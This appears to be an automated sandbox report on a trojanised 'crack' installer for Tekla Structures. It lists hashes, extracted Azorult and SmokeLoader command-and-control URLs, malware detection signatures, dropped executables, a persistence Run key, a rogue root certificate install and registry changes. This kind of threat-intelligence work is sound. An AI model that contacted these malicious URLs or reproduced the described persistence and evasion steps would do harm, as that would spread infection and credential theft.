Analysis
-
max time kernel
53s -
max time network
300s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
03-04-2021 07:46
Static task
static1
Behavioral task
behavioral1
Sample
Tekla_Structures_21_1_Russia_crack_by_aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Tekla_Structures_21_1_Russia_crack_by_aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Tekla_Structures_21_1_Russia_crack_by_aaocg.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Tekla_Structures_21_1_Russia_crack_by_aaocg.exe
Resource
win10v20201028
General
-
Target
Tekla_Structures_21_1_Russia_crack_by_aaocg.exe
-
Size
5.4MB
-
MD5
baad366f257529076340afc66d1ac59c
-
SHA1
3dafcc431b85bd6a527e70879137e1f27e160849
-
SHA256
3f5a92454d1b626e24016329a9de52e40d78aae1e5977f53e820a2e2812d3975
-
SHA512
98d2e5ace89934ebc193ae6b8277b363d9d197a54bbcf6dfa3f40df2671d89c87e4d13737ea99eceb9a2a1ac3bd135ffa53d555f93f72ff2a36f1874cb94dd85
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/5440-211-0x00000000024B0000-0x0000000002DBA000-memory.dmp family_glupteba behavioral2/memory/5440-212-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/5440-213-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/6104-209-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/6104-206-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/6104-220-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/6104-235-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 11 IoCs
pid Process 1504 keygen-pr.exe 3856 keygen-step-1.exe 2104 keygen-step-3.exe 2728 keygen-step-4.exe 4092 key.exe 2228 Setup.exe 3144 multitimer.exe 2276 setups.exe 2664 askinstall20.exe 2672 setups.tmp 4604 multitimer.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 2672 setups.tmp 2672 setups.tmp 2672 setups.tmp 2672 setups.tmp 2672 setups.tmp 2672 setups.tmp 2672 setups.tmp -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ekr1mbomcfl = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\XDOPG9ZFTE\\multitimer.exe\" 1 3.1617436097.60681dc102765" multitimer.exe -
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA BTRSetp.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 367 ip-api.com 96 api.ipify.org 144 ipinfo.io 147 ipinfo.io 198 ip-api.com 218 api.ipify.org 312 ipinfo.io 316 ipinfo.io -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 7308 5632 WerFault.exe 143 -
Delays execution with timeout.exe 1 IoCs
pid Process 4528 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 4 IoCs
pid Process 4192 taskkill.exe 6392 taskkill.exe 6372 taskkill.exe 5812 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B7216 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6" BTRSetp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VersionHigh = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 105f82f76e28d701 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\SubSysId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" BTRSetp.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\EnableNegotiate = "1" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 998267c856add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 0d2f54f86e28d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-08760 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus BTRSetp.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\AllComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 01000000594cb2d4b95d62c383650cf0f299cfabe91872effd4736cbceb696e152765e88c0137ce182a7348c4da8864e9d3f3c96a4e37022296f6916c429 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "0" MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = 010000008d619e1e1deedbda574426a5764d2e08650e911ca137685de277943d1e83ea1e74fd877766ba40b18fff124d9fbbf423a6e23ed31c5ae156f82fa44e43fc85ee29b29d06ae3bc5e6b19bb462f5d4edee57e3a8307ff0afb9007c MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\FirstRecoveryTime = 998267c856add601 MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 3544 PING.EXE 4824 PING.EXE 5124 PING.EXE -
